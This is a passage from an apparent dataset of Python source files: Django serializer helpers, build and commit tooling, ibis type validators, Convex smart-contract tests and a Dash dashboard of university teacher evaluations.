queryset (or any iterator that returns database objects) using\n a certain serializer.\n \"\"\"\n s = get_serializer(format)()\n s.serialize(queryset, **options)\n return s.getvalue()\n\ndef deserialize(format, stream_or_string):\n \"\"\"\n Deserialize a stream or a string. Returns an iterator that yields ``(obj,\n m2m_relation_dict)``, where ``obj`` is a instantiated -- but *unsaved* --\n object, and ``m2m_relation_dict`` is a dictionary of ``{m2m_field_name :\n list_of_related_objects}``.\n \"\"\"\n d = get_deserializer(format)\n return d(stream_or_string)\n\ndef _load_serializers():\n \"\"\"\n Register built-in and settings-defined serializers. This is done lazily so\n that user code has a chance to (e.g.) set up custom settings without\n needing to be careful of import order.\n \"\"\"\n global _serializers\n serializers = {}\n for format in BUILTIN_SERIALIZERS:\n register_serializer(format, BUILTIN_SERIALIZERS[format], serializers)\n if hasattr(settings, \"SERIALIZATION_MODULES\"):\n for format in settings.SERIALIZATION_MODULES:\n register_serializer(format, settings.SERIALIZATION_MODULES[format], serializers)\n _serializers = serializers\n"} {"ext": "py", "sha": "1a2eb501f42562afc6ecf94a3a3f06b412f2f738", "content": "__copyright__ = \"Copyright 2017, Georgia Institute of Technology\"\n__license__ = \"MIT\"\n__version_info__ = ('0', '0', '1')\n__version__ = '.'.join(__version_info__)\n__maintainer__ = \"Marat Dukhan\"\n__email__ = \"maratek@gmail.com\"\n\nimport logging\nlogger = logging.getLogger(\"confu\")\nlogger.setLevel(logging.INFO)\n\nconsole_handler = logging.StreamHandler()\nconsole_handler.setLevel(logging.INFO)\n\n\nclass ConsoleFormatter(logging.Formatter):\n def __init__(self):\n super(ConsoleFormatter, self).__init__(\"%(message)s\")\n\n def format(self, record):\n message = super(ConsoleFormatter, self).format(record)\n if record.levelname in [\"DEBUG\", \"INFO\"]:\n return message[0].upper() + message[1:]\n else:\n return {\n \"WARNING\": \"Warning\", \"ERROR\": \"Error\", \"CRITICAL\": \"Fatal error\"\n }[record.levelname] + \": \" + message[0].lower() + message[1:]\n\nconsole_formatter = ConsoleFormatter()\nconsole_handler.setFormatter(console_formatter)\nlogger.addHandler(console_handler)\n\n\nfrom confu.builds import Build\nfrom confu.platform import Platform\n\n\ndef standard_parser(description=\"Confu configuration script\"):\n import argparse\n\n from os import linesep\n from confu.platform import host, possible_targets\n\n parser = argparse.ArgumentParser(description=description,\n formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\"--target\", dest=\"target\", metavar=\"PLATFORM\", type=Platform,\n default=host.name,\n help=\"platform where the code will run. Potential options:\" + linesep +\n \" \" + host.name + \" (default)\" + linesep +\n linesep.join(\" \" + target for target in possible_targets[1:]))\n parser.add_argument(\"--toolchain\", dest=\"toolchain\", metavar=\"TOOLCHAIN\",\n choices=[\"auto\", \"gnu\", \"clang\"], default=\"auto\",\n help=\"toolchain to use for compilation. Potential options:\" + linesep +\n linesep.join(\" \" + name for name in [\"auto (default)\", \"gnu\", \"clang\"]))\n\n \n\n return parser\n"} {"ext": "py", "sha": "1a2eb7178da2387741821181e4ea26b67dd1ed12", "content": "import pytest\n\nfrom commitizen import BaseCommitizen, defaults, factory\nfrom commitizen.config import BaseConfig\nfrom commitizen.exceptions import NoCommitizenFoundException\n\n\ndef test_factory():\n config = BaseConfig()\n config.settings.update({\"name\": defaults.name})\n r = factory.commiter_factory(config)\n assert isinstance(r, BaseCommitizen)\n\n\ndef test_factory_fails():\n config = BaseConfig()\n config.settings.update({\"name\": \"Nothing\"})\n with pytest.raises(NoCommitizenFoundException) as excinfo:\n factory.commiter_factory(config)\n\n assert \"The committer has not been found in the system.\" in str(excinfo)\n"} {"ext": "py", "sha": "1a2eb90337162598e808c77019efb7954485e0d3", "content": "import datetime\nimport zipfile\nfrom os import chdir, getpid, getcwd, listdir, walk, path\n\n\ndef listdir_cwd():\n \"\"\"\n Lazy listdir for cwd.\n :return:\n \"\"\"\n return listdir(getcwd())\n\n\ndef f(x, fn):\n \"\"\"\n Le Zip\n :param x:\n :param fn:\n :return:\n \"\"\"\n with zipfile.ZipFile.open(fn, 'a', zipfile.ZIP_LZMA, True) as file:\n file.write(x)\n file.close()\n print(f'{getpid()}: {x}')\n return x\n\n\ndef utc_now_to_file_str():\n \"\"\"\n Format UTC now to _YYYYmmdd_HHMMSS\n :return:\n \"\"\"\n return datetime.datetime.strftime(datetime.datetime.utcnow(), '_%Y%m%d_%H%M%S')\n\n\ndef create_filename(prefix, extension):\n \"\"\"\n Create filename to be used.\n :param prefix:\n :param extension:\n :return:\n \"\"\"\n return f'{prefix}{utc_now_to_file_str()}.{extension}'\n\n\ndef log_folders_destination_targets(dest, targets, filename):\n \"\"\"\n Log Folders, destination, and targets.\n :param dest:\n :param targets:\n :param filename:\n :return:\n \"\"\"\n print(f'\\n Destination Folder: {dest}'\n f'\\n Targets: {str(len(targets))}'\n f'\\n File: {filename}')\n\n\ndef get_all_file_locs(targets):\n \"\"\"\n Gets all file locations.\n :return:\n \"\"\"\n file_list = []\n for target in targets:\n chdir(target)\n for root, dirs, files in walk(target):\n for file in files:\n file_list.append(path.join(root, file))\n return file_list\n"} {"ext": "py", "sha": "1a2eb91dd532d9114ec4f0292e619b09f489bbb7", "content": "import collections\nimport enum\n\nfrom itertools import starmap, product\n\nimport six\n\nfrom ibis.compat import suppress\nimport ibis.util as util\nimport ibis.common as com\nimport ibis.expr.types as ir\nimport ibis.expr.schema as sch\nimport ibis.expr.datatypes as dt\n\ntry:\n from cytoolz import curry, compose, identity\nexcept ImportError:\n from toolz import curry, compose, identity\n\n\ndef highest_precedence_dtype(exprs):\n \"\"\"Return the highest precedence type from the passed expressions\n\n Also verifies that there are valid implicit casts between any of the types\n and the selected highest precedence type.\n This is a thin wrapper around datatypes highest precedence check.\n\n Parameters\n ----------\n exprs : Iterable[ir.ValueExpr]\n A sequence of Expressions\n\n Returns\n -------\n dtype: DataType\n The highest precedence datatype\n \"\"\"\n if not exprs:\n raise ValueError('Must pass at least one expression')\n\n return dt.highest_precedence(expr.type() for expr in exprs)\n\n\ndef castable(source, target):\n \"\"\"Return whether source ir type is implicitly castable to target\n\n Based on the underlying datatypes and the value in case of Literals\n \"\"\"\n op = source.op()\n value = getattr(op, 'value', None)\n return dt.castable(source.type(), target.type(), value=value)\n\n\ndef comparable(left, right):\n return castable(left, right) or castable(right, left)\n\n\ndef cast(source, target):\n \"\"\"Currently Literal to *Scalar implicit casts are allowed\"\"\"\n import ibis.expr.operations as ops # TODO: don't use ops here\n\n if not castable(source, target):\n raise com.IbisTypeError('Source is not castable to target type!')\n\n # currently it prevents column -> scalar implicit castings\n # however the datatypes are matching\n op = source.op()\n if not isinstance(op, ops.Literal):\n raise com.IbisTypeError('Only able to implicitly cast literals!')\n\n out_type = target.type().scalar_type()\n return out_type(op)\n\n\n# ---------------------------------------------------------------------\n# Input type validators / coercion functions\n\n\nclass validator(curry):\n\n def __repr__(self):\n return '{}({}{})'.format(\n self.func.__name__,\n repr(self.args)[1:-1],\n ', '.join('{}={!r}'.format(k, v) for k, v in self.keywords.items())\n )\n\n\nnoop = validator(identity)\n\n\n@validator\ndef one_of(inners, arg):\n \"\"\"At least one of the inner validators must pass\"\"\"\n for inner in inners:\n with suppress(com.IbisTypeError, ValueError):\n return inner(arg)\n\n rules_formatted = ', '.join(map(repr, inners))\n raise com.IbisTypeError(\n 'Arg passes neither of the following rules: {}'.format(rules_formatted)\n )\n\n\n@validator\ndef all_of(inners, arg):\n \"\"\"All of the inner valudators must pass.\n\n The order of inner validators matters.\n\n Parameters\n ----------\n inners : List[validator]\n Functions are applied from right to left so allof([rule1, rule2], arg) is\n the same as rule1(rule2(arg)).\n arg : Any\n Value to be validated.\n\n Returns\n -------\n arg : Any\n Value maybe coerced by inner validators to the appropiate types\n \"\"\"\n return compose(*inners)(arg)\n\n\n@validator\ndef isin(values, arg):\n if arg not in values:\n raise ValueError(\n 'Value with type {} is not in {!r}'.format(type(arg), values)\n )\n if isinstance(values, dict): # TODO check for mapping instead\n return values[arg]\n else:\n return arg\n\n\n@validator\ndef member_of(obj, arg):\n if isinstance(arg, enum.Enum):\n enum.unique(obj) # check that enum has unique values\n arg = arg.name\n\n if not hasattr(obj, arg):\n raise com.IbisTypeError(\n 'Value with type {} is not a member of {}'.format(type(arg), obj)\n )\n return getattr(obj, arg)\n\n\n@validator\ndef list_of(inner, arg, min_length=0):\n if isinstance(arg, six.string_types) or not isinstance(\n arg, (collections.Sequence, ir.ListExpr)\n ):\n raise com.IbisTypeError('Argument must be a sequence')\n\n if len(arg) < min_length:\n raise com.IbisTypeError(\n 'Arg must have at least {} number of elements'.format(min_length)\n )\n return ir.sequence(list(map(inner, arg)))\n\n\n@validator\ndef datatype(arg):\n return dt.dtype(arg)\n\n\n@validator\ndef instance_of(klass, arg):\n \"\"\"Require that a value has a particular Python type.\"\"\"\n if not isinstance(arg, klass):\n raise com.IbisTypeError(\n 'Given argument with type {} is not an instance of {}'.format(\n type(arg), klass\n )\n )\n return arg\n\n\n@validator\ndef value(dtype, arg):\n \"\"\"Validates that the given argument is a Value with a particular datatype\n\n Parameters\n ----------\n dtype : DataType subclass or DataType instance\n arg : python literal or an ibis expression\n If a python literal is given the validator tries to coerce it to an ibis\n literal.\n\n Returns\n -------\n arg : AnyValue\n An ibis value expression with the specified datatype\n \"\"\"\n if not isinstance(arg, ir.Expr):\n # coerce python literal to ibis literal\n arg = ir.literal(arg)\n\n if not isinstance(arg, ir.AnyValue):\n raise com.IbisTypeError('Given argument with type {} is not a value '\n 'expression'.format(type(arg)))\n\n # retrieve literal values for implicit cast check\n value = getattr(arg.op(), 'value', None)\n\n if isinstance(dtype, type) and isinstance(arg.type(), dtype):\n # dtype class has been specified like dt.Interval or dt.Decimal\n return arg\n elif dt.castable(arg.type(), dt.dtype(dtype), value=value):\n # dtype instance or string has been specified and arg's dtype is\n # implicitly castable to it, like dt.int8 is castable to dt.int64\n return arg\n else:\n raise com.IbisTypeError('Given argument with datatype {} is not '\n 'subtype of {} nor implicitly castable to '\n 'it'.format(arg.type(), dtype))\n\n\n@validator\ndef scalar(inner, arg):\n return instance_of(ir.ScalarExpr, inner(arg))\n\n\n@validator\ndef column(inner, arg):\n return instance_of(ir.ColumnExpr, inner(arg))\n\n\n@validator\ndef array_of(inner, arg):\n val = arg if isinstance(arg, ir.Expr) else ir.literal(arg)\n argtype = val.type()\n if not isinstance(argtype, dt.Array):\n raise com.IbisTypeError(\n 'Argument must be an array, got expression {} which is of type '\n '{}'.format(val, val.type()))\n return value(dt.Array(inner(val[0]).type()), val)\n\n\nany = value(dt.any)\ndouble = value(dt.double)\nstring = value(dt.string)\nboolean = value(dt.boolean)\ninteger = value(dt.int64)\ndecimal = value(dt.Decimal)\nfloating = value(dt.float64)\ndate = value(dt.date)\ntime = value(dt.time)\ntimestamp = value(dt.Timestamp)\ncategory = value(dt.category)\ntemporal = one_of([timestamp, date, time])\n\nstrict_numeric = one_of([integer, floating, decimal])\nsoft_numeric = one_of([integer, floating, decimal, boolean])\nnumeric = soft_numeric\n\nset_ = value(dt.Set)\narray = value(dt.Array)\nstruct = value(dt.Struct)\nmapping = value(dt.Map(dt.any, dt.any))\n\n\n@validator\ndef interval(arg, units=None):\n arg = value(dt.Interval, arg)\n unit = arg.type().unit\n if units is not None and unit not in units:\n msg = 'Interval unit `{}` is not among the allowed ones {}'\n raise com.IbisTypeError(msg.format(unit, units))\n return arg\n\n\n@validator\ndef client(arg):\n from ibis.client import Client\n return instance_of(Client, arg)\n\n\n# ---------------------------------------------------------------------\n# Ouput type promoter functions\n\n\ndef promoter(fn):\n def wrapper(name_or_value, *args, **kwargs):\n if isinstance(name_or_value, str):\n return lambda self: fn(getattr(self, name_or_value),\n *args, **kwargs)\n else:\n return fn(name_or_value, *args, **kwargs)\n return wrapper\n\n\n@promoter\ndef shape_like(arg, dtype=None):\n if isinstance(arg, (tuple, list, ir.ListExpr)):\n datatype = dtype or highest_precedence_dtype(arg)\n columnar = util.any_of(arg, ir.AnyColumn)\n else:\n datatype = dtype or arg.type()\n columnar = isinstance(arg, ir.AnyColumn)\n\n dtype = dt.dtype(datatype)\n\n if columnar:\n return dtype.array_type()\n else:\n return dtype.scalar_type()\n\n\n@promoter\ndef scalar_like(arg):\n output_dtype = arg.type()\n return output_dtype.scalar_type()\n\n\n@promoter\ndef array_like(arg):\n output_dtype = arg.type()\n return output_dtype.array_type()\n\n\ncolumn_like = array_like\n\n\n@promoter\ndef typeof(arg):\n return arg._factory\n\n\n@validator\ndef table(schema, arg):\n \"\"\"A table argument.\n\n Parameters\n ----------\n schema : Union[sch.Schema, List[Tuple[str, dt.DataType]]\n A validator for the table's columns. Only column subset validators are\n currently supported. Accepts any arguments that `sch.schema` accepts.\n See the example for usage.\n arg : The validatable argument.\n\n Examples\n --------\n The following op will accept an argument named ``'table'``. Note that the\n ``schema`` argument specifies rules for columns that are required to be in\n the table: ``time``, ``group`` and ``value1``. These must match the types\n specified in the column rules. Column ``value2`` is optional, but if\n present it must be of the specified type. The table may have extra columns\n not specified in the schema.\n \"\"\"\n assert isinstance(arg, ir.TableExpr)\n\n if arg.schema() >= sch.schema(schema):\n return arg\n\n raise com.IbisTypeError(\n 'Argument is not a table with column subset of {}'.format(schema)\n )\n\n\n# TODO: might just use bounds instead of actual literal values\n# that could simplify interval binop output_type methods\ndef _promote_numeric_binop(exprs, op):\n bounds, dtypes = [], []\n for arg in exprs:\n dtypes.append(arg.type())\n if hasattr(arg.op(), 'value'):\n # arg.op() is a literal\n bounds.append([arg.op().value])\n else:\n bounds.append(arg.type().bounds)\n\n # In some cases, the bounding type might be int8, even though neither\n # of the types are that small. We want to ensure the containing type is\n # _at least_ as large as the smallest type in the expression.\n values = starmap(op, product(*bounds))\n dtypes += [dt.infer(value, allow_overflow=True) for value in values]\n\n return dt.highest_precedence(dtypes)\n\n\n@promoter\ndef numeric_like(args, op):\n if util.all_of(args, ir.IntegerValue):\n dtype = _promote_numeric_binop(args, op)\n return shape_like(args, dtype=dtype)\n else:\n return shape_like(args)\n\n\n# TODO: create varargs marker for impala udfs\n"} {"ext": "py", "sha": "1a2eb9326f0aab349c6869d901d2e8f44591ddbc", "content": "\"\"\"\n\n\n Test Convex Breaking\n\n\"\"\"\n\nimport pytest\nimport secrets\n\nfrom convex_api.account import Account\nfrom convex_api.api import API\nfrom convex_api.exceptions import ConvexAPIError\nfrom convex_api.utils import (\n add_0x_prefix,\n to_address\n)\n\n\ndef test_convex_recursion(convex, test_account):\n chain_length = 4\n address_list = []\n for index in range(0, chain_length):\n contract = f\"\"\"\n(def chain-{index}\n (deploy\n '(do\n (def stored-data\n ^{{:private? true}}\n nil\n )\n (def chain-address\n ^{{:private? true}}\n nil\n )\n (defn get\n ^{{:callable? true}}\n []\n (call chain-address (get))\n )\n (defn set\n ^{{:callable? true}}\n [x]\n ( if chain-address (call chain-address(set x)) (def stored-data x))\n )\n (defn set-chain-address\n ^{{:callable? true}}\n [x]\n (def chain-address x)\n )\n )\n )\n)\n\"\"\"\n convex.topup_account(test_account)\n result = convex.send(contract, test_account)\n address_list.append(to_address(result['value']))\n for index in range(0, chain_length):\n next_index = index + 1\n if next_index == chain_length:\n next_index = 0\n call_address = address_list[next_index]\n result = convex.send(f'(call chain-{index} (set-chain-address #{call_address}))', test_account)\n test_number = secrets.randbelow(1000)\n if index == chain_length - 1:\n with pytest.raises(ConvexAPIError, match='DEPTH'):\n result = convex.send(f'(call chain-{index} (set {test_number}))', test_account)\n else:\n result = convex.send(f'(call chain-0 (set {test_number}))', test_account)\n assert(result)\n assert(result['value'] == test_number)\n with pytest.raises(ConvexAPIError, match='DEPTH'):\n convex.query('(call chain-0 (get))', test_account)\n\ndef test_schedule_transfer(convex, test_account, other_account):\n # you can send coins to an actor , if it exports the receive-coin function\n\n contract = \"\"\"\n(def transfer-for-ever\n (deploy\n '(do\n (defn tx-delay\n ^{:callable? true}\n [to-address amount]\n (transfer to-address amount)\n (def call-address *address*)\n (schedule (+ *timestamp* 1000) (call call-address (tx-delay to-address amount)))\n )\n (defn tx-now\n ^{:callable? true}\n [to-address amount]\n (transfer to-address amount)\n )\n (defn show-schedule\n ^{:callable? true}\n []\n [(get *state* :schedule) *address*]\n )\n (defn receive-coin\n ^{:callable? true}\n [sender amount data]\n (accept amount)\n )\n )\n )\n)\n\"\"\"\n# (call contract-address (tx-to to-address amount))\n\n convex.topup_account(test_account)\n convex.topup_account(other_account, 8000000)\n result = convex.send(contract, test_account)\n contract_address = to_address(result['value'])\n convex.transfer(contract_address, 800000, other_account)\n convex.topup_account(test_account)\n result = convex.send(f'(call #{contract_address} (tx-delay #{other_account.address} 1000))', test_account)\n print(result)\n result = convex.send(f'(call #{contract_address} (show-schedule))', test_account)\n print(result)\n"} {"ext": "py", "sha": "1a2eb97675cb4a0da568b8029692ffa97378cbb7", "content": "# Autores:\n# Darlan de Castro Silva Filho\n# Marcos Henrique Fernandes Marcone\n\n\nfrom pandas import Series, DataFrame\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly.graph_objs as go\nimport plotly.express as px\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\n\n# Funções de estilização e opções das bibliotecas utilizadas\nplt.style.use('classic')\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\n\n# Função para o path das bases de dados\n# Entrada: nome = string\n# Saida: path = string\n\n\ndef path(nome):\n return './'+nome+'.csv'\n\n\n# Importa os arquivos (bases de dados) utilizados\nunidades = pd.read_csv(path('unidades'), sep=';')\ndocentes = pd.read_csv(path('docentes'), sep=';')\navaliacao = pd.read_csv(path('avaliacaoDocencia'), sep=';')\n\n# Filtra os docentes que trabalham em Natal e que tenham a categoria de Professor do Magistério Superior\nunidadesFiltradas = unidades.loc[:, [\n 'id_unidade', 'municipio', 'unidade_responsavel']]\ndocentesComUnidadeAcademica = pd.merge(\n docentes, unidadesFiltradas, left_on=\"id_unidade_lotacao\", right_on=\"id_unidade\").drop('id_unidade', axis=1)\ndocentesNatalUnidadeAcademica = docentesComUnidadeAcademica[\n docentesComUnidadeAcademica['municipio'] == 'NATAL']\ndocentesNatalMSUnidadeAcademica = docentesNatalUnidadeAcademica[\n docentesNatalUnidadeAcademica['categoria'] == 'PROFESSOR DO MAGISTERIO SUPERIOR']\n\n# Filtra as unidades_dirigentes não aceitas pela aplicação\ndocentesNatalMSUnidadeAcademica['unidade_dirigente'] = np.where(docentesNatalMSUnidadeAcademica['unidade_responsavel'] == 'UNIVERSIDADE FEDERAL DO RIO GRANDE DO NORTE', (\n docentesNatalMSUnidadeAcademica['lotacao']), (docentesNatalMSUnidadeAcademica['unidade_responsavel']))\nunidadesNaoAceitas = ['PRÓ-REITORIA DE EXTENSÃO UNIVERSITÁRIA', 'MUSEU CÂMARA CASCUDO', 'UNIVERSIDADE FEDERAL DO RIO GRANDE DO NORTE', 'EDITORA UNIVERSITÁRIA', 'EMPRESA BRASILEIRA DE SERVICOS HOSPITALARES',\n 'REITORIA', 'INSTITUTO DE MEDICINA TROPICAL - IMT-RN', 'SECRETARIA DE EDUCAÇÃO A DISTÂNCIA', 'GABINETE DO REITOR', 'SUPERINTENDENCIA DE COMUNICACAO', 'PRÓ-REITORIA DE ADMINISTRAÇÃO (PROAD)']\ndocentesNatalMSUnidadeAcademica = docentesNatalMSUnidadeAcademica[~docentesNatalMSUnidadeAcademica['unidade_dirigente'].isin(\n unidadesNaoAceitas)]\n\n# Gráfico de barras da distribuição dos docentes da UFRN por unidade acadêmica\nquantidadeDocentesUnidadeDirigente = docentesNatalMSUnidadeAcademica['unidade_dirigente'].value_counts(\n)\nbarraDocentesUnidadeDirigente = go.Bar(x=quantidadeDocentesUnidadeDirigente.index,\n y=quantidadeDocentesUnidadeDirigente.values, text=quantidadeDocentesUnidadeDirigente.values, textposition='auto')\nlayoutDocentesUnidadeDirigente = go.Layout(title='Gráfico de docentes por unidade responsável (UFRN 2021 - Unidades de Natal - Magistério Superior)', xaxis={\n 'title': 'Unidade responsável'}, yaxis={'title': 'Número de docentes'})\nfiguraDocentesUnidadeDirigente = go.Figure(\n data=[barraDocentesUnidadeDirigente], layout=layoutDocentesUnidadeDirigente)\n\n# Gráfico de pizza da distribuição dos docentes da UFRN por sexo\nquantidadeDocentesSexo = docentesNatalMSUnidadeAcademica['sexo'].value_counts()\npiechartSexo = go.Pie(labels=['Masculino', 'Feminino'], values=quantidadeDocentesSexo.values, text=quantidadeDocentesSexo.values, marker={\n 'colors': ['#665FD1', '#FFFF7E'], 'line': dict(color='#000000', width=2)})\nlayoutDocentesSexo = go.Layout(title='Gráfico de docentes por sexo (UFRN 2021 - Unidades de Natal - Magistério Superior)',\n xaxis={'title': 'Docentes'}, yaxis={'title': 'Número de docentes'}, barmode='stack')\nfiguraDocentesSexo = go.Figure(data=piechartSexo, layout=layoutDocentesSexo)\n\n# Gráfico de pizza da distribuição dos docentes da UFRN por formação acadêmica\nquantidadeDocentesFormacao = docentesNatalMSUnidadeAcademica['formacao'].value_counts(\n)\npiechartFormacao = go.Pie(labels=quantidadeDocentesFormacao.index, values=quantidadeDocentesFormacao.values, text=quantidadeDocentesFormacao.values, marker={\n 'colors': ['#665FD1', '#FFFF7E', '#F5054F', '#3F012C'], 'line': dict(color='#000000', width=2)})\nlayoutDocentesFormacao = go.Layout(title='Gráfico de docentes por formação (UFRN 2021 - Unidades de Natal - Magistério Superior)',\n xaxis={'title': 'Formação'}, yaxis={'title': 'Número de docentes'})\nfiguraDocentesFormacao = go.Figure(\n data=[piechartFormacao], layout=layoutDocentesFormacao)\n\n# Gráfico de pizza da distribuição dos docentes da UFRN por classe funcional\nquantidadeDocentesClasseFuncional = docentesNatalMSUnidadeAcademica['classe_funcional'].value_counts(\n).sort_index()\npiechartClasseFuncional = go.Pie(labels=quantidadeDocentesClasseFuncional.index, values=quantidadeDocentesClasseFuncional.values,\n text=quantidadeDocentesClasseFuncional.values, marker={'colors': px.colors.qualitative.Dark24, 'line': dict(color='#000000', width=2)})\nbarraDocentesClasseFuncional = go.Bar(x=quantidadeDocentesClasseFuncional.index, y=quantidadeDocentesClasseFuncional.values,\n text=quantidadeDocentesClasseFuncional.values, textposition='auto', marker={'color': '#5D21D0'})\nlayoutDocentesClasseFuncional = go.Layout(title='Gráfico de docentes por classe funcional (UFRN 2021 - Unidades de Natal - Magistério Superior)', xaxis={\n 'title': 'Classe funcional'}, yaxis={'title': 'Número de docentes'}, height=450)\nfiguraDocentesClasseFuncional = go.Figure(\n data=[piechartClasseFuncional], layout=layoutDocentesClasseFuncional)\n\n# Cria gráfico para ressaltar os dados de classe funcional dos docentes agrupados por unidade_dirigente\nfiltroClasseFuncional = ['unidade_dirigente', 'classe_funcional']\ndocentesClasseGroupBy = docentesNatalMSUnidadeAcademica.groupby(\n filtroClasseFuncional).count().reset_index().loc[:, filtroClasseFuncional + ['nome']]\ndocentesClasseGroupBy['quantidade'] = docentesClasseGroupBy['nome']\ndel docentesClasseGroupBy['nome']\nfigClasseDetalhe = px.bar(docentesClasseGroupBy, x=\"unidade_dirigente\", y=\"quantidade\", color=\"classe_funcional\",\n text='quantidade', color_discrete_sequence=px.colors.qualitative.Bold, height=800)\n\n# Cria gráfico para ressaltar os dados de sexo dos docentes agrupados por unidade_dirigente\nfiltroSexo = ['unidade_dirigente', 'sexo']\ndocentesSexoGroupBy = docentesNatalMSUnidadeAcademica.groupby(\n filtroSexo).count().reset_index().loc[:, filtroSexo + ['nome']]\ndocentesSexoGroupBy['quantidade'] = docentesSexoGroupBy['nome']\ndel docentesSexoGroupBy['nome']\nfigSexoDetalhe = px.bar(docentesSexoGroupBy, x=\"unidade_dirigente\", y=\"quantidade\",\n color=\"sexo\", text='quantidade', color_discrete_sequence=px.colors.qualitative.Bold)\n\n# Cria gráfico para ressaltar os dados de formação acadêmica dos docentes agrupados por unidade_dirigente\nfiltroFormacao = ['unidade_dirigente', 'formacao']\ndocentesFormacaoGroupBy = docentesNatalMSUnidadeAcademica.groupby(\n filtroFormacao).count().reset_index().loc[:, filtroFormacao + ['nome']]\ndocentesFormacaoGroupBy['quantidade'] = docentesFormacaoGroupBy['nome']\ndel docentesFormacaoGroupBy['nome']\nfigFormacaoDetalhe = px.bar(docentesFormacaoGroupBy, x=\"unidade_dirigente\",\n y=\"quantidade\", color=\"formacao\", text='quantidade', range_y=[0, 400])\n\n# Cria um dicionário com os dados indexados por unidade_dirigente\nunidadesDirigentes = docentesNatalMSUnidadeAcademica['unidade_dirigente'].unique(\n)\nunidadesDirigentes\ndfUnidadesDirigentes = {}\nfor unidadeDirigente in unidadesDirigentes:\n df = docentesNatalMSUnidadeAcademica[docentesNatalMSUnidadeAcademica['unidade_dirigente'] == unidadeDirigente]\n dfUnidadesDirigentes[unidadeDirigente] = df\n\n# Função utilizada na filtragem de um dataFrame agrupando os dados por uma propriedade e o filtrando por outras duas\n# Entradas: df = DataFrame, title = string, x = string, y = string, cor = ['rgb(a,b,c)','rgb(d,e,f)'...]\n# Saídas: figAdmissao = Gráfico de barras\n\n\ndef filtrarDFPorUnidadeDirigente(df, title, x, y, cor=px.colors.qualitative.Bold):\n dfFinal = df[title]\n filtro = [x, y]\n docentesFiltroGroupBy = dfFinal.groupby(\n filtro).count().reset_index().loc[:, filtro + ['nome']]\n docentesFiltroGroupBy['quantidade'] = docentesFiltroGroupBy['nome']\n del docentesFiltroGroupBy['nome']\n figAdmissao = px.bar(docentesFiltroGroupBy, x=x, y=\"quantidade\", color=y,\n text='quantidade', color_discrete_sequence=cor, title=title)\n return figAdmissao\n\n\n# Cria e formata um dataFrame geral com todos os professores e os atributos necessários para a geração dos gráficos e da tabela por média\navaliacaoDocentesFiltro = avaliacao[avaliacao['nome_docente'].isin(\n docentesNatalMSUnidadeAcademica['nome'])]\navaliacaoDocentesFiltro['total_postura'] = avaliacaoDocentesFiltro['postura_profissional_media'] * \\\n avaliacaoDocentesFiltro['qtd_discentes']\navaliacaoDocentesFiltro['total_atuacao'] = avaliacaoDocentesFiltro['atuacao_profissional_media'] * \\\n avaliacaoDocentesFiltro['qtd_discentes']\ndocentesMedias = avaliacaoDocentesFiltro.loc[:, [\n 'nome_docente', 'qtd_discentes', 'total_postura', 'total_atuacao']]\ndocentesMediasGroupBy = docentesMedias.groupby(['nome_docente']).sum()\ndocentesMediasGroupBy['media_postura'] = docentesMediasGroupBy['total_postura'] / \\\n docentesMediasGroupBy['qtd_discentes']\ndocentesMediasGroupBy['media_atuacao'] = docentesMediasGroupBy['total_atuacao'] / \\\n docentesMediasGroupBy['qtd_discentes']\ndocentesMediasGroupBy['media_alunos'] = avaliacaoDocentesFiltro.groupby(\n ['nome_docente']).mean().loc[:, 'autoavaliacao_aluno_media']\ndocentesMediasNatalMSUnidadeAcademica = pd.merge(\n docentesNatalMSUnidadeAcademica, docentesMediasGroupBy, left_on=\"nome\", right_on=\"nome_docente\").round(3)\n\n# Exclui os campos não necessários para a geração da tabela de notas e assinala os campos restantes para um novo dataFrame\ndocenteParaTabelaNotas = docentesMediasNatalMSUnidadeAcademica.loc[:, [\n 'nome', 'media_postura', 'media_atuacao', 'media_alunos', 'unidade_dirigente', 'lotacao', 'qtd_discentes']]\n\n# Faz a filtragem e formatação de um dataFrame para agrupas os dados da media_postura, media_atuacao e media_alunos por undade_dirigente\ndocentesMediaUnidadeDirigente = docentesMediasNatalMSUnidadeAcademica.groupby(\n 'unidade_dirigente').mean().loc[:, ['media_postura', 'media_atuacao', 'media_alunos']]\ndocentesMediaUnidadeDirigente['unidade_dirigente'] = docentesMediaUnidadeDirigente.index\n\n# Faz a filtragem e formatação de um dataFrame para conter as informações da media_postura, media_atuacao e media_alunos a serem apresentas no gráfico de linha por evolução temporal\ndocentesMediasAno = avaliacaoDocentesFiltro.loc[:, [\n 'nome_docente', 'qtd_discentes', 'total_postura', 'total_atuacao', 'ano']]\ndocentesMediasAnoGroupBy = docentesMediasAno.groupby(['ano']).sum()\ndocentesMediasAnoGroupBy['media_postura'] = docentesMediasAnoGroupBy['total_postura'] / \\\n docentesMediasAnoGroupBy['qtd_discentes']\ndocentesMediasAnoGroupBy['media_atuacao'] = docentesMediasAnoGroupBy['total_atuacao'] / \\\n docentesMediasAnoGroupBy['qtd_discentes']\ndocentesMediasAnoGroupBy['media_alunos'] = avaliacaoDocentesFiltro.groupby(\n ['ano']).mean().loc[:, 'autoavaliacao_aluno_media']\ndocentesMediasAnoGroupBy['ano'] = docentesMediasAnoGroupBy.index\n\n# Cria o gráfico de linhas da evolução temporal da media_postura, media_atuacao e media_alunos\nfiguraMediasAnoGroupBy = go.Figure()\nfiguraMediasAnoGroupBy.add_trace(go.Scatter(x=docentesMediasAnoGroupBy['ano'], y=docentesMediasAnoGroupBy['media_postura'],\n mode='lines',\n name='media_postura'))\nfiguraMediasAnoGroupBy.add_trace(go.Scatter(x=docentesMediasAnoGroupBy['ano'], y=docentesMediasAnoGroupBy['media_atuacao'],\n mode='lines',\n name='media_atuacao'))\nfiguraMediasAnoGroupBy.add_trace(go.Scatter(x=docentesMediasAnoGroupBy['ano'], y=docentesMediasAnoGroupBy['media_alunos'],\n mode='lines',\n name='media_alunos'))\nfiguraMediasAnoGroupBy.update_layout(\n title='Evolução da avaliação dos discentes e docentes do magistério superior da UFRN nos anos de 2013 à 2019')\n\n# Define as opções de unidades dirigentes que serão mostradas no 'dropdown-1'\nindicadoresDropdown1 = [\n 'GERAL'] + list(docentesNatalMSUnidadeAcademica['unidade_dirigente'].unique())\n\n# Estilos das divs dos gráficos iniciais\nestilosDivGraficosIniciais = {'width': '95%',\n 'display': 'inline-block', 'padding': '0 20'}\n\n# Cria a variável app e escolhe os stylesheets da aplicação\nexternal_stylesheets = 